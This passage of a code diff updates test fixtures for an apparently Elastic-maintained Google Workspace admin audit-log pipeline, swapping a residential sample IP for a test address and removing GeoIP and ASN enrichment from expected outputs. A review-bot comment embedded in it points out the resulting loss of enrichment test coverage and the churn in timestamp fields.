+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USER_INVITE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"VIEW_TEMP_PASSWORD","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"TURN_OFF_2_STEP_VERIFICATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNBLOCK_USER_SESSION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNENROLL_USER_FROM_TITANIUM","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ARCHIVE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UPDATE_BIRTHDATE","parameters":[{"name":"BIRTHDATE","value":"2002-10-02T15:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CREATE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DOWNGRADE_USER_FROM_GPLUS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USER_ENROLLED_IN_TWO_STEP_VERIFICATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DOWNLOAD_USERLIST_CSV"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"MOVE_USER_TO_ORG_UNIT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"RENAME_USER","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNENROLL_USER_FROM_STRONG_AUTH","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"SUSPEND_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNARCHIVE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNDELETE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNSUSPEND_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UPGRADE_USER_TO_GPLUS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USERS_BULK_UPLOAD","parameters":[{"name":"BULK_UPLOAD_FAIL_USERS_NUMBER","value":"0"},{"name":"BULK_UPLOAD_TOTAL_USERS_NUMBER","value":"10"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USERS_BULK_UPLOAD_NOTIFICATION_SENT","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log-expected.json
index 06d3ae6126e..d406f2949e8 100644
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log-expected.json
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log-expected.json
@@ -11,7 +11,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -35,35 +35,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301156800Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.004798300Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "DELETE_2SV_SCRATCH_CODES",
 "id": "1",
@@ -100,7 +82,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
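Review bot: The regenerated expected document in `@@ -35,35 +35,17 @@` drops `source.geo` and `source.as` outright instead of replacing them with values for the new address, so from this commit on the pipeline test asserts that no GeoIP/ASN enrichment occurs and that branch of the pipeline is no longer covered; the same pattern repeats in every `-N,35 +M,17` hunk of this file through `@@ -1070,35 +854,17 @@`. If pipeline tests in this harness genuinely run without a GeoIP database, that loss of coverage is worth a sentence in the PR description so it reads as a known trade-off; if they do have one, the fixture may have been regenerated against a node without it and should be regenerated before merge. The `event.ingested` values also churn in every hunk, which makes future fixture diffs noisier than the intended change; if the harness supports marking such fields as dynamic, that would keep them out of the expected file. Swapping the residential `98.235.162.24`, which resolved to a named city and ISP, for a reserved test address is the right thing to do for a committed fixture.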
@@ -124,35 +106,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301187100Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GENERATE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.004807500Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GENERATE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "GENERATE_2SV_SCRATCH_CODES",
 "id": "1",
@@ -188,7 +152,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -212,35 +176,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301192200Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_DEVICE_TOKENS\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.004813100Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_DEVICE_TOKENS\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "REVOKE_3LO_DEVICE_TOKENS",
 "id": "1",
@@ -271,7 +217,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -295,35 +241,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301207500Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_TOKEN\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.004818600Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_TOKEN\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "REVOKE_3LO_TOKEN",
 "id": "1",
@@ -355,7 +283,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -379,35 +307,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301210400Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.004824Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "ADD_RECOVERY_EMAIL",
 "id": "1",
@@ -444,7 +354,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -468,35 +378,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301212600Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.004829400Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "ADD_RECOVERY_PHONE",
 "id": "1",
@@ -533,7 +425,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -557,35 +449,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301214500Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.004834800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "GRANT_ADMIN_PRIVILEGE",
 "id": "1",
@@ -622,7 +496,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -646,35 +520,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301226500Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.004840200Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "REVOKE_ADMIN_PRIVILEGE",
 "id": "1",
@@ -710,7 +566,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -734,35 +590,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301228800Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ASP\",\"parameters\":[{\"name\":\"ASP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.004845700Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ASP\",\"parameters\":[{\"name\":\"ASP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "REVOKE_ASP",
 "id": "1",
@@ -793,7 +631,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -815,35 +653,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
